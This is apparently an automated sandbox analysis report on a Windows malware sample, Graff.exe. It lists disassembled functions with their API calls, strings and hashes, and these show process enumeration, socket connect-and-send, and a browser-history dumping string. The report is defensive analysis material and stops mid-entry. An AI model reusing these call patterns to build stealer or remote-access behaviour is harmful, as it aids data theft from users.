Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
CloseHandle.KERNEL32(00000000), ref: 0040E8AB

Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7

Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: 372a26e7cddc8ac6843706b42e6fd3dd0df786e8a494852b736f12d61837b539
Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
Opcode Fuzzy Hash: 372a26e7cddc8ac6843706b42e6fd3dd0df786e8a494852b736f12d61837b539
Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A

Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044310A
_free.LIBCMT ref: 0044312A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84

Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
__alloca_probe_16.LIBCMT ref: 0044FF58
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
__freea.LIBCMT ref: 0044FFC4

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?), ref: 00446B31

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4

Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 1000715C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
_free.LIBCMT ref: 100071B8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0

Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E144
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?), ref: 00446B31

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
_free.LIBCMT ref: 0044E1A0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9

Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
_free.LIBCMT ref: 10005BB4
_free.LIBCMT ref: 10005BDB
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164

Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
_free.LIBCMT ref: 00446F7D
_free.LIBCMT ref: 00446FA4
SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F

Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE

Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5

Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100091D0

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100091E2
_free.LIBCMT ref: 100091F4
_free.LIBCMT ref: 10009206
_free.LIBCMT ref: 10009218

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64

Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F7B5

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 0044F7C7
_free.LIBCMT ref: 0044F7D9
_free.LIBCMT ref: 0044F7EB
_free.LIBCMT ref: 0044F7FD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C

Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000536F

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10005381
_free.LIBCMT ref: 10005394
_free.LIBCMT ref: 100053A5
_free.LIBCMT ref: 100053B6

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84

Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443305

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 00443317
_free.LIBCMT ref: 0044332A
_free.LIBCMT ref: 0044333B
_free.LIBCMT ref: 0044334C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E

Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 00416768
GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
IsWindowVisible.USER32(?), ref: 004167A1

Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8

Strings

(FG, xrefs: 0041692A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ProcessWindow$Open$TextThreadVisible
String ID: (FG
API String ID: 3142014140-2273637114
Opcode ID: 86b5a055fdcbd930091b3fef7641ac020180f92da4d5a2cccfe6113c143a45b1
Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
Opcode Fuzzy Hash: 86b5a055fdcbd930091b3fef7641ac020180f92da4d5a2cccfe6113c143a45b1
Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A

Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044D4A8
_free.LIBCMT ref: 0044D5C5

Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F

Strings

*?, xrefs: 0044D49C
., xrefs: 0044D77C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54

Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409601

Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,015B9780,00000010), ref: 004042A5

Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Strings

XCG, xrefs: 0040962C
>G, xrefs: 00409657
`AG, xrefs: 00409676

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsendsocket
String ID: XCG$`AG$>G
API String ID: 2334542088-2372832151
Opcode ID: dd31b0230ec24a95fad7e4144ff5c09ff6616713dab43c5063031757251188dc
Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
Opcode Fuzzy Hash: dd31b0230ec24a95fad7e4144ff5c09ff6616713dab43c5063031757251188dc
Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A

Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\misruling\Graff.exe,00000104), ref: 10004C1D
_free.LIBCMT ref: 10004CE8
_free.LIBCMT ref: 10004CF2

Strings

C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 10004C14, 10004C1B, 10004C4A, 10004C82

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe
API String ID: 2506810119-23911111
Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54

Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\misruling\Graff.exe,00000104), ref: 00442714
_free.LIBCMT ref: 004427DF
_free.LIBCMT ref: 004427E9

Strings

C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 0044270B, 00442712, 00442741, 00442779

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe
API String ID: 2506810119-23911111
Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59

Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A

Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,774D3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633

Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC

Strings

/sort "Visit Time" /stext ", xrefs: 00403A76
8>G, xrefs: 00403A5B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$8>G
API String ID: 368326130-2663660666
Opcode ID: e0074e42e7704986260eea99f70e76e500ed04f6c6fb6ad012614bce8c5eec24
